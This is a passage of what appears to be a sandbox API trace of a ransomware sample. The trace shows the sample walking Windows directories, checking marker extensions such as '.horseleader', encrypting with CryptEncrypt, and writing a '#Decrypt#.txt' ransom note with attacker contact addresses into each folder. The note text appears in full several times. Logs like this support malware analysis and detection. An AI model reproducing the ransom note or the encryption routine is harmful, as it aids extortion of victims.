cAlternateFileName="")) returned 1 [0234.226] lstrcmpiW (lpString1="nl-NL", lpString2="Windows") returned -1 [0234.227] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL") returned 60 [0234.227] lstrcmpW (lpString1="nl-NL", lpString2=".") returned 1 [0234.227] lstrcmpW (lpString1="nl-NL", lpString2="..") returned 1 [0234.227] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.227] GetProcessHeap () returned 0x780000 [0234.227] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7db828 [0234.227] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*") returned 62 [0234.227] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.227] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.227] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\.") returned 62 [0234.227] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.227] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.228] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.228] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\..") returned 63 [0234.228] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.228] lstrcmpW (lpString1="..", lpString2="..") returned 
0 [0234.228] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4fe5f52, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe52213c5, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5247522, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.228] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.228] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui") returned 76 [0234.228] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.228] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.228] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.228] lstrlenW (lpString=".testttjffg") returned 11 [0234.228] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.228] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.228] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.228] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.228] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4fe5f52, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe52213c5, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5247522, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.228] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.229] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\#Decrypt#.txt") returned 74 [0234.229] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.230] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.230] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.231] lstrlenA (lpString="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") returned 1368 [0234.231] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.231] CloseHandle (hObject=0x158) returned 1 [0234.232] GetProcessHeap () returned 0x780000 [0234.232] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.232] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0234.232] lstrcmpiW (lpString1="pl-PL", lpString2="Windows") returned -1 [0234.232] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL") returned 60 [0234.232] lstrcmpW (lpString1="pl-PL", lpString2=".") returned 1 [0234.232] lstrcmpW (lpString1="pl-PL", lpString2="..") returned 1 [0234.232] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.232] GetProcessHeap () returned 0x780000 [0234.232] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7db828 [0234.232] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*") returned 62 [0234.232] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.233] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.234] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\.") returned 62 [0234.234] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.234] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.234] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.234] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\..") returned 63 [0234.234] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.234] lstrcmpW (lpString1="..", lpString2="..") returned 
0 [0234.234] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe42361e6, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe44977b6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe44977b6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.234] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.234] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\tipresx.dll.mui") returned 76 [0234.234] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.234] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.234] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.234] lstrlenW (lpString=".testttjffg") returned 11 [0234.234] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.234] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.234] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.234] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.235] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe42361e6, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe44977b6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe44977b6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.235] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.236] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\#Decrypt#.txt") returned 74 [0234.236] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.236] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.236] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.238] lstrlenA (lpString="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") returned 1368 [0234.238] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.238] CloseHandle (hObject=0x158) returned 1 [0234.238] GetProcessHeap () returned 0x780000 [0234.238] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.238] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0234.238] lstrcmpiW (lpString1="pt-BR", lpString2="Windows") returned -1 [0234.238] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR") returned 60 [0234.238] lstrcmpW (lpString1="pt-BR", lpString2=".") returned 1 [0234.238] lstrcmpW (lpString1="pt-BR", lpString2="..") returned 1 [0234.238] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.238] GetProcessHeap () returned 0x780000 [0234.238] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7db828 [0234.238] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*") returned 62 [0234.238] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.239] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.239] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\.") returned 62 [0234.239] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.239] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.239] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.239] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\..") returned 63 [0234.239] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.239] lstrcmpW (lpString1="..", lpString2="..") returned 
0 [0234.239] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe59917ef, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe5b809a8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5b809a8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.239] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.239] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui") returned 76 [0234.239] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.239] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.239] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.239] lstrlenW (lpString=".testttjffg") returned 11 [0234.239] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.240] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.240] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.240] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.240] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe59917ef, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe5b809a8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5b809a8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.240] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.240] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\#Decrypt#.txt") returned 74 [0234.240] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.241] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.241] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.242] lstrlenA (lpString="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") returned 1368 [0234.242] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.242] CloseHandle (hObject=0x158) returned 1 [0234.243] GetProcessHeap () returned 0x780000 [0234.243] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.243] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0234.243] lstrcmpiW (lpString1="pt-PT", lpString2="Windows") returned -1 [0234.243] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT") returned 60 [0234.243] lstrcmpW (lpString1="pt-PT", lpString2=".") returned 1 [0234.243] lstrcmpW (lpString1="pt-PT", lpString2="..") returned 1 [0234.243] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.243] GetProcessHeap () returned 0x780000 [0234.243] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
